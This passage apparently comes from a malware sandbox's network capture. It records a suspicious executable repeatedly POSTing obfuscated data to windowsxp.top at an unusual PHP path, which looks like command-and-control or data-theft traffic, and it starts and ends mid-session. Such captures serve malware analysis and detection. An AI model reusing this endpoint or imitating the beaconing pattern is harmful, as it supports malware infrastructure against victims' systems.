                                                                                                                  Oct 27, 2024 19:23:15.126722097 CET1716OUTData Raw: 55 5b 5d 58 5b 5f 53 52 54 58 57 54 54 57 5b 58 59 5c 5b 5e 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[]X[_SRTXWTTW[XY\[^RQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&-,X!\>6$[,$3;$W8-;)<(V70/ )?5-!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:15.362649918 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:15.561651945 CET913INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vw0hNXSpHCGxjezVL%2Foza34qzUMbsk5xW6jCib80GTg6jY3i8jRAaXYTth0%2Bt434afsrVjPeoj3yRerEgQ6IfBdCOtln8ks8vEx1PIGdBAQFb5JnO1B5zrgDnrQ1ZGpg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b758a8eec872-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=970509&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5f 22 2d 30 1f 28 2c 0c 08 2a 08 26 06 25 3c 29 13 3b 0c 30 13 29 3e 39 1c 2e 01 32 12 24 24 22 1d 28 17 28 13 22 3e 0a 57 3e 35 21 5e 00 1c 27 5b 21 3e 21 53 32 05 24 5b 27 1e 3c 17 36 3e 28 07 2a 3e 2d 1d 2b 2a 3f 07 3e 2b 3f 17 2d 2f 03 50 31 39 32 59 2d 3b 35 06 3e 2a 2a 54 0c 14 21 12 39 3c 3c 5e 36 31 18 0a 29 1c 38 10 27 58 34 57 30 14 2c 10 2b 3f 23 16 28 3d 36 00 21 02 3f 02 2a 28 3a 5a 25 2d 23 1e 2b 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a
                                                                                                                  Data Ascii: 98"_"-0(,*&%<);0)>9.2$$"((">W>5!^'[!>!S2$['<6>(*>-+*?>+?-/P192Y-;5>**T!9<<^61)8'X4W0,+?#(=6!?*(:Z%-#+."T")S0YP
                                                                                                                  Oct 27, 2024 19:23:15.561666012 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.449866188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:15.199466944 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:15.555471897 CET1008OUTData Raw: 55 5a 58 58 5b 5f 56 54 54 58 57 54 54 55 5b 59 59 5b 5b 58 52 52 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZXX[_VTTXWTTU[YY[[XRRRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'> ")"#5 \-$0Y38(->/)?T7",8-[>..!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:15.811698914 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:16.031846046 CET780INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2sjTPkNYGLfG%2FhuCOiZ7Y0NdhBt0HxXIE%2FBwtyevitLBh%2BanRjAVIIdXjpvYfoJ2D1MSLtbwxXu85%2BbrkNL2%2FRYj0NCoTtM9ENnou%2Frc3eyEwtrMqV1YiHHLA22VI0g"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b75b7bc6e786-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1092006&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.449872188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:16.433196068 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:16.789941072 CET1012OUTData Raw: 55 5a 58 59 5b 5b 56 51 54 58 57 54 54 57 5b 5b 59 5a 5b 5d 52 55 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZXY[[VQTXWTTW[[YZ[]RURYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2<!)&!6].4$Y$(V-.;*/<V7"3;0>[-!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:17.037880898 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:17.263052940 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMfs7rs%2FXQrlDDHeY5lb4WoN7760Q7eumwrK8HYJfQRGMSbkkMZNXm2UToDn%2BwMiav%2Fm4A8rklXpXOdB4wB0UOT0bczRjoCwIqLy6p1oSMs8bgQGFnlDmKiGdn3uEhUa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b76319f6e7db-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.449878188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:17.398598909 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:17.742999077 CET1012OUTData Raw: 50 52 58 5c 5b 5f 56 56 54 58 57 54 54 50 5b 52 59 5c 5b 5b 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRX\[_VVTXWTTP[RY\[[RTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'.[6::" .$'+/#)Y<""8,Y)9!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:17.987400055 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:18.338105917 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2UE6hlZuX8vO%2FqskRvMAWmTKTD60%2BJFbyV9nU9mHoe5xCIoRVdb%2F6YgBjfHtu%2BM3dEr8QdNZefPRIEDsl9D3O5Cq2PMtkv%2B2ssO2xm54BbGLA2kGC3omFQS68zyGWR8n"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7690b232caa-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1066273&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.449884188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:18.475924969 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:18.823627949 CET1012OUTData Raw: 55 56 58 5b 5e 59 56 52 54 58 57 54 54 52 5b 5b 59 5d 5b 50 52 55 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX[^YVRTXWTTR[[Y][PRURRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.766"6$-$'$8+;>#(?? ?,3Y*6,?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:19.080559969 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:19.385049105 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FARBsRq4fmhtlSszxF50F2V62pPvkmYg%2BclWrR6VGwpCYt1N5pATMMHEKuCi%2B4vN7Dl7tcL8hH5LQ3kMb1xm%2Fr89l5OrlS6MC4Z%2Fd8ISDVkqmr2eiryLDKkwNEhRL%2Fmc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b76fd922eaa0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1215&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1234441&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:19.385067940 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.449890188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:19.509474039 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:19.868072987 CET1012OUTData Raw: 55 5a 58 5e 5e 52 53 52 54 58 57 54 54 50 5b 5d 59 58 5b 51 52 57 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZX^^RSRTXWTTP[]YX[QRWR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%>Y"9Y"6;.(X388P/?)?7!'/-7X=<:Z-/!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:20.104995966 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:20.414608955 CET770INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcFkkJzBsFA0pRER3s66qAmwcm99SQ8BX5oBgF%2Fs%2FLZO8jvkqRwVBp0Ejnh4ZNIqTnCFFhn2PrQO3GxaBzZSAJaE3j2q1dt0VxM4U6MijacLw4KbAtuBZ9wJeZOyhKM0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77649b46c1c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1294012&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.449896188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:20.608278990 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1692
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:20.963224888 CET1692OUTData Raw: 55 5a 5d 5f 5e 58 53 55 54 58 57 54 54 54 5b 5e 59 5a 5b 5f 52 54 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]_^XSUTXWTTT[^YZ[_RTRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&4Z!1"6(Z-B30;(--$S*/,P"!3Z->(=/!:!Y##X('
                                                                                                                  Oct 27, 2024 19:23:21.232511044 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:21.539321899 CET920INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NMkReiks7ojsUiWstoQgZYugYaZ3CUBkrY%2FfUsKdDRuckxnPc6lN%2BTsgdHKyTsJbfL12Gp8wohcduulhixpl7Lncw7nFaFI2IDUidRi%2BVhGXhuQ7acAS2kqAEA3HSfTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77d5ccd0bb8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1606&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2013&delivery_rate=924058&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 22 3e 3c 11 28 3f 29 1e 2a 31 21 1d 25 2c 39 10 2e 32 06 11 3d 03 2a 0e 39 38 3a 51 24 34 07 43 3f 07 0a 11 23 00 02 53 2b 25 21 5e 00 1c 27 5c 22 00 39 14 26 3b 27 03 27 1e 24 5e 35 13 28 07 2a 58 2d 51 2b 07 05 06 3f 2b 30 0c 2c 11 31 55 26 17 22 5a 2d 2b 2e 5a 28 10 2a 54 0c 14 21 58 2d 59 23 02 22 21 1b 1e 2a 22 16 5b 27 2d 2b 0b 30 14 0e 10 2b 12 34 05 3c 2d 39 10 21 02 0a 5c 3f 38 36 5a 27 3d 2b 59 2a 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]"><(?)*1!%,9.2=*98:Q$4C?#S+%!^'\"9&;''$^5(*X-Q+?+0,1U&"Z-+.Z(*T!X-Y#"!*"['-+0+4<-9!\?86Z'=+Y*."T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.449897188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:20.659945011 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:21.009491920 CET1012OUTData Raw: 55 53 58 54 5e 5c 56 55 54 58 57 54 54 53 5b 5a 59 50 5b 59 52 5f 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXT^\VUTXWTTS[ZYP[YR_R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1,X"95]"6\-4$^$^ W/.4T)#413/-(=9-!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:21.240716934 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:21.472637892 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X43NltoWchlpjdK9SXEWb%2BR8XU%2Br6Pw0fJLou5Not1oVmgV8LFeDp6k0f5LZypAX4g%2FRqiOznef%2Blu0xlNnvtAKgadEAaT5b5sFDR8bU%2FhjbAdi%2FgbOJkXLgo8tinAtK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77d6b0c0c17-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1062362&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.449903188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:21.607111931 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:21.962794065 CET1012OUTData Raw: 50 55 5d 58 5b 5f 56 5e 54 58 57 54 54 57 5b 58 59 5e 5b 5e 52 51 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PU]X[_V^TXWTTW[XY^[^RQRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&35:%#5$[9$,]$838U*/(#1/,=_./!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:22.226033926 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:22.528465986 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZ7wL3W1Ap0YGiCx9l02t4abhAFRK5EujuFR0eU8bsDabg3oK%2FMvhBd2F92BvmwLSw7KUXeItW9Dtc0eTsm4T4GyP7jFuycdpezV2eZER4eJ9VKTM4s0xQmAF8Av5sfS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7837edf6b28-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
